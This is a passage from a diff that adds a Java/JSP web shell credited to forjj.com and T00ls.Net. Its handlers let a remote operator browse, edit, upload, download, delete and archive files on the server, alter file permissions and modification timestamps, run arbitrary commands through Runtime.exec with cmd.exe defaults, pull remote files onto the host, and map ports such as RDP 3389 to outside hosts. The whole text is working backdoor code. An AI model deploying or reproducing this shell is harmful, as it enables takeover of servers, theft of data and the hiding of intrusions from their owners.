+"<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"+
+"<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"+Util.convertPath(file.getAbsolutePath())+"'}).parent()\">Goto Parent</a></td>"+
+"</tr>");	
+}
+int dircount = 0;
+int filecount = 0;
+for (File f:list) {
+if (f.isDirectory()) {
+dircount ++;
+out.println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"+
+"<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"+
+"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).subdir()\">"+f.getName()+"</a></td>"+
+"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+"<td nowrap>--</td>"+
+"<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
+"<td nowrap><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a></td>"+
+"</tr>");
+} else {
+filecount++;
+out.println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"+
+"<td width=\"2%\" nowrap><input type='checkbox' value='"+f.getName()+"'/></td>"+
+"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">"+f.getName()+"</a></td>"+
+"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+"<td nowrap>"+Util.getSize(f.length(),'B')+"</td>"+
+"<td nowrap>"+
+""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
+"<td nowrap>"+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEdit()\">Edit</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">Down</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).copy()\">Copy</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEditProperty()\">Property</a>");
+if (f.getName().endsWith(".zip")) {
+out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).unpack()\">UnPack</a>");
+} else if (f.getName().endsWith(".rar")) {
+out.println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
+} else {
+out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a>");
+}
+out.println("</td>"+
+"</tr>");
+}
+}
+out.println("<tr class=\"alt2\"><td align=\"center\">&nbsp;</td>"+
+"  <td><a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a></td>"+
+"  <td colspan=\"4\" align=\"right\">"+dircount+" directories / "+filecount+" files</td></tr>"+
+"</table>");
+out.println("</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+}
+private static class LogoutInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Object dbo = JSession.getAttribute(DBO);
+if (dbo != null)
+((DBOperator)dbo).close();
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket s = (ServerSocket)obj;
+s.close();
+}
+Object online = JSession.getAttribute(SHELL_ONLINE);
+if (online != null)
+((OnLineProcess)online).stop();
+JSession.invalidate();
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class UploadInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+UploadBean fileBean = new UploadBean();
+response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString());
+fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString());
+fileBean.parseRequest(request);
+JSession.setAttribute(MSG,"Upload File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class CopyInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String src = request.getParameter("src");
+String to = request.getParameter("to");
+BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src)));
+BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to)));
+byte[] d = new byte[1024];
+int len = input.read(d);
+while(len != -1) {
+output.write(d,0,len);
+len = input.read(d);
+}
+output.close();
+input.close();
+JSession.setAttribute(MSG,"Copy File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BottomInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+response.getWriter().println("<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Copyright (C) 2009 <a href=\"http://www.forjj.com\" target=\"_blank\">http://www.Forjj.com/</a>&nbsp;&nbsp;<a target=\"_blank\" href=\"http://www.t00ls.net/\">[T00ls.Net]</a> All Rights Reserved."+
+"</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VCreateFileInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+File f = new File(path);
+if (!f.isAbsolute()) {
+String oldPath = path;
+path = JSession.getAttribute(CURRENT_DIR).toString();
+if (!path.endsWith("/"))
+path+="/";
+path+=oldPath;
+f = new File(path);
+f.createNewFile();
+} else {
+f.createNewFile();
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Create / Edit File &raquo;</h2>"+
+"<input type='hidden' name='o' value='createFile'>"+
+"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  /></p>"+
+"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"+
+"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VEditInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+File f = new File(path);
+if (f.exists()) {
+BufferedReader reader = new BufferedReader(new FileReader(f));
+StringBuilder content = new StringBuilder();
+String s = reader.readLine();
+while (s != null) {
+content.append(s+"\r\n");
+s = reader.readLine();
+}
+reader.close();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Create / Edit File &raquo;</h2>"+
+"<input type='hidden' name='o' value='createFile'>"+
+"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  /></p>"+
+"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"+Util.htmlEncode(content.toString())+"</textarea></p>"+
+"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class CreateFileInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+String content = request.getParameter("filecontent");
+
+BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path)));
+outs.write(content,0,content.length());
+outs.close();
+JSession.setAttribute(MSG,"Save File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VEditPropertyInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String filepath = request.getParameter("filepath");
+File f = new File(filepath);
+if (!f.exists())
+return;
+String read = f.canRead() ? "checked=\"checked\"" : "";
+String write = f.canWrite() ? "checked=\"checked\"" : "";
+String execute = f.canExecute() ? "checked=\"checked\"" : "";
+Calendar cal = Calendar.getInstance();
+cal.setTimeInMillis(f.lastModified());
+
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Set File Property &raquo;</h2>"+
+"<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""+request.getParameter("filepath")+"\" type=\"text\" size=\"120\"  /></p>"+
+"<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "+
+"<p>Read: "+
+"  <input type=\"checkbox\" "+read+" name=\"read\" id=\"checkbox\"> "+
+"  Write: "+
+"  <input type=\"checkbox\" "+write+" name=\"write\" id=\"checkbox2\"> "+
+"  Execute: "+
+"  <input type=\"checkbox\" "+execute+" name=\"execute\" id=\"checkbox3\">"+
+"</p>"+
+"<p>Instead &raquo;"+
+"year:"+
+"<input class=\"input\" name=\"year\" value="+cal.get(Calendar.YEAR)+" id=\"year\" type=\"text\" size=\"4\"  />"+
+"month:"+
+"<input class=\"input\" name=\"month\" value="+(cal.get(Calendar.MONTH)+1)+" id=\"month\" type=\"text\" size=\"2\"  />"+
+"day:"+
+"<input class=\"input\" name=\"date\" value="+cal.get(Calendar.DATE)+" id=\"date\" type=\"text\" size=\"2\"  />"+
+""+
+"hour:"+
+"<input class=\"input\" name=\"hour\" value="+cal.get(Calendar.HOUR)+" id=\"hour\" type=\"text\" size=\"2\"  />"+
+"minute:"+
+"<input class=\"input\" name=\"minute\" value="+cal.get(Calendar.MINUTE)+" id=\"minute\" type=\"text\" size=\"2\"  />"+
+"second:"+
+"<input class=\"input\" name=\"second\" value="+cal.get(Calendar.SECOND)+" id=\"second\" type=\"text\" size=\"2\"  />"+
+"</p>"+
+"<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class EditPropertyInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String f = request.getParameter("file");
+File file = new File(f);
+if (!file.exists())
+return;
+String read = request.getParameter("read");
+String write = request.getParameter("write");
+String execute = request.getParameter("execute");
+String year = request.getParameter("year");
+String month = request.getParameter("month");
+String date = request.getParameter("date");
+String hour = request.getParameter("hour");
+String minute = request.getParameter("minute");
+String second = request.getParameter("second");
+if (Util.isEmpty(read)) {
+file.setReadable(false);
+} else {
+file.setReadable(true);
+}
+if (Util.isEmpty(write)) {
+file.setWritable(false);
+} else {
+file.setWritable(true);
+}
+if (Util.isEmpty(execute)) {
+file.setExecutable(false);
+} else {
+file.setExecutable(true);
+}
+Calendar cal = Calendar.getInstance();
+cal.set(Calendar.YEAR,Integer.parseInt(year));
+cal.set(Calendar.MONTH,Integer.parseInt(month)-1);
+cal.set(Calendar.DATE,Integer.parseInt(date));
+cal.set(Calendar.HOUR,Integer.parseInt(hour));
+cal.set(Calendar.MINUTE,Integer.parseInt(minute));
+cal.set(Calendar.SECOND,Integer.parseInt(second));
+if(file.setLastModified(cal.getTimeInMillis())){
+JSession.setAttribute(MSG,"Reset File Property Success!");
+} else {
+JSession.setAttribute(MSG,"Reset File Property Failed!");
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VShell
+private static class VsInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String cmd = request.getParameter("command");
+String program = request.getParameter("program");
+if (cmd == null) cmd = "cmd.exe /c set";
+if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt";
+if (JSession.getAttribute(MSG)!=null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Execute Program &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+"<input type=\"hidden\" name=\"type\" value=\"program\">"+
+"Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""+program+"\" type=\"text\" size=\"100\"  />"+
+"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Execute Shell &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+"<input type=\"hidden\" name=\"type\" value=\"command\">"+
+"Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""+cmd+"\" type=\"text\" size=\"100\"  />"+
+"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form>"+
+"</td>"+
+"</tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ShellInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String type = request.getParameter("type");
+if (type.equals("command")) {
+ins.get("vs").invoke(request,response,JSession);
+out.println("<div style='margin:10px'><hr/>");
+out.println("<pre>");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("</pre></div>");
+}
+} else {
+String program = request.getParameter("program");
+if (!Util.isEmpty(program)) {
+Process pro = Runtime.getRuntime().exec(program);
+JSession.setAttribute(MSG,"Program Has Run Success!");
+ins.get("vs").invoke(request,response,JSession);
+}
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DownInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String path  = request.getParameter("path");
+if (Util.isEmpty(path)) 
+return;
+File f = new File(path);
+if (!f.exists()) 
+return;
+response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET));
+BufferedInputStream input = new BufferedInputStream(new FileInputStream(f));
+BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream());
+byte[] data = new byte[1024];
+int len = input.read(data);
+while (len != -1) {
+output.write(data,0,len);
+len = input.read(data);
+}
+input.close();
+output.close();
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VDown
+private static class VdInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String savepath = request.getParameter("savepath");
+String url = request.getParameter("url");
+if (Util.isEmpty(url))
+url = "http://www.forjj.com/";
+if (Util.isEmpty(savepath)) {
+savepath = JSession.getAttribute(CURRENT_DIR).toString();
+}
+if (!Util.isEmpty(JSession.getAttribute("done"))) {
+Util.outMsg(out,"Download Remote File Success!");
+JSession.removeAttribute("done");
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Remote File DownLoad &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"downRemote\">"+
+"Remote File URL:"+
+"  <input class=\"input\" name=\"url\" value=\""+url+"\" id=\"url\" type=\"text\" size=\"70\"  />"+
+"Save Path:"+
+"<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""+savepath+"\" type=\"text\" size=\"70\"  />"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DownRemoteInvoker extends DefaultInvoker {
+public boolean doBefore(){return true;}
+public boolean doAfter(){return true;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String downFileUrl = request.getParameter("url");
+String savePath = request.getParameter("savepath");
+if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
+return;
+URL downUrl = new URL(downFileUrl);
+URLConnection conn = downUrl.openConnection();
+BufferedInputStream in = new BufferedInputStream(conn.getInputStream());
+BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath)));
+byte[] data = new byte[1024];
+int len = in.read(data);
+while (len != -1) {
+out.write(data,0,len);
+len = in.read(data);
+}
+in.close();
+out.close();
+JSession.setAttribute("done","d");
+ins.get("vd").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class IndexInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+ins.get("filelist").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MkDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String name = request.getParameter("name");
+File f = new File(name);
+if (!f.isAbsolute()) {
+String path = JSession.getAttribute(CURRENT_DIR).toString();
+if (!path.endsWith("/"))
+path += "/";
+path += name;
+f = new File(path);
+}
+f.mkdirs();
+JSession.setAttribute(MSG,"Make Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MoveInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String src = request.getParameter("src");
+String target  = request.getParameter("to");
+if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
+File file = new File(src);
+if(file.renameTo(new File(target))) {
+JSession.setAttribute(MSG,"Move File Success!");
+} else {
+String msg = "Move File Failed!";
+if (file.isDirectory()) {
+msg += "The Move Will Failed When The Directory Is Not Empty.";
+}
+JSession.setAttribute(MSG,msg);
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class RemoteDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String dir = request.getParameter("dir");
+File file = new File(dir);
+if (file.exists()) {
+deleteFile(file);
+deleteDir(file);
+}
+
+JSession.setAttribute(MSG,"Remove Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+public void deleteFile(File f) {
+if (f.isFile()) {
+f.delete();
+}else {
+File[] list = f.listFiles();
+for (File ff:list) {
+deleteFile(ff);
+}
+}
+}
+public void deleteDir(File f) {
+File[] list = f.listFiles();
+if (list.length == 0) {
+f.delete();
+} else {
+for (File ff:list) {
+deleteDir(ff);
+}
+deleteDir(f);
+}
+}
+}
+private static class PackBatchInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (Util.isEmpty(files))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String[] arr = files.split(",");
+for (String f:arr) {
+File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f);
+ZipEntry entry = new ZipEntry(pF.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(pF);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+}
+private static class PackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String packedFile = request.getParameter("packedfile");
+if (Util.isEmpty(packedFile))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+File pF = new File(packedFile);
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String base = "";
+if (pF.isDirectory()) {
+zipDir(pF,base,zout);
+} else {
+zipFile(pF,base,zout);
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+public void zipDir(File f,String base,ZipOutputStream zout)  throws Exception {
+if (f.isDirectory()) {
+File[] arr = f.listFiles();
+for (File ff:arr) {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
+tmpBase += "/";
+zipDir(ff,tmpBase+f.getName(),zout);
+}
+} else {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/"))
+tmpBase += "/";
+zipFile(f,tmpBase,zout);
+}
+}
+public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{
+ZipEntry entry = new ZipEntry(base+f.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(f);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+}
+private static class UnPackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String savepath = request.getParameter("savepath");
+String zipfile = request.getParameter("zipfile");
+if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
+return;
+File save = new File(savepath);
+save.mkdirs();
+ZipFile file = new ZipFile(new File(zipfile));   
+Enumeration e = file.entries();   
+while (e.hasMoreElements()) {   
+ZipEntry en = (ZipEntry) e.nextElement(); 
+String entryPath = en.getName();
+int index = entryPath.lastIndexOf("/");
+if (index != -1)
+entryPath = entryPath.substring(0,index);
+File absEntryFile = new File(save,entryPath);
+if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) 
+absEntryFile.mkdirs();
+BufferedOutputStream output = null;
+BufferedInputStream input = null;
+try {
+output = new BufferedOutputStream(   
+new FileOutputStream(new File(save,en.getName())));   
+input = new BufferedInputStream(   
+file.getInputStream(en));   
+byte[] b = new byte[1024];   
+int len = input.read(b);   
+while (len != -1) {   
+output.write(b, 0, len);   
+len = input.read(b);   
+}   
+} catch (Exception ex) {
+} finally {
+try {
+if (output != null)
+output.close();
+if (input != null)
+input.close();
+} catch (Exception ex1) {
+}
+}
+}
+file.close();
+JSession.setAttribute(MSG,"Unzip File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VMapPort
+private static class VmpInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object localIP = JSession.getAttribute("localIP");
+Object localPort = JSession.getAttribute("localPort");
+Object remoteIP = JSession.getAttribute("remoteIP");
+Object remotePort = JSession.getAttribute("remotePort");
+Object done = JSession.getAttribute("done");
+
+JSession.removeAttribute("localIP");
+JSession.removeAttribute("localPort");
+JSession.removeAttribute("remoteIP");
+JSession.removeAttribute("remotePort");
+JSession.removeAttribute("done");
+
+if (Util.isEmpty(localIP))
+localIP = InetAddress.getLocalHost().getHostAddress();
+if (Util.isEmpty(localPort))
+localPort = "3389";
+if (Util.isEmpty(remoteIP))
+remoteIP = "www.forjj.com";
+if (Util.isEmpty(remotePort))
+remotePort = "80";
+if (!Util.isEmpty(done))
+Util.outMsg(out,done.toString());
+
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<input type=\"hidden\" name=\"o\" value=\"mapPort\">"+
+"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td><h2 id=\"Bin_H2_Title\">PortMap &gt;&gt;</h2>"+
+"      <div id=\"hOWTm\">"+
+"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"      <tr align=\"center\">"+
+"        <td style=\"width:5%\"></td>"+
+"        <td style=\"width:20%\" align=\"left\">Local Ip :"+
+"          <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+localIP+"\" />"+
+"          </td>"+
+"        <td style=\"width:20%\" align=\"left\">Local Port :"+
+"          <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+localPort+"\" /></td>"+
+"        <td style=\"width:20%\" align=\"left\">Remote Ip :"+
+"          <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+remoteIP+"\" /></td>"+
+"        <td style=\"width:20%\" align=\"left\">Remote Port :"+
+"          <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""+remotePort+"\" /></td>"+
+"      </tr>"+
+"      <tr align=\"center\">"+
+"        <td colspan=\"5\"><br/>"+
+"          <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"+
+"			<input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"+SHELL_NAME+"?o=smp'\" class=\"bt\" />"+
+"    </td>"+
+"    </tr>"+
+"	</table>"+
+"    </div>"+
+"</td>"+
+"</tr>"+
+"</table>"+
+"</form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//StopMapPort
+private static class SmpInvoker extends DefaultInvoker {
+public boolean doAfter(){return true;}
+public boolean doBefore(){return true;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP);
+server.close();
+}
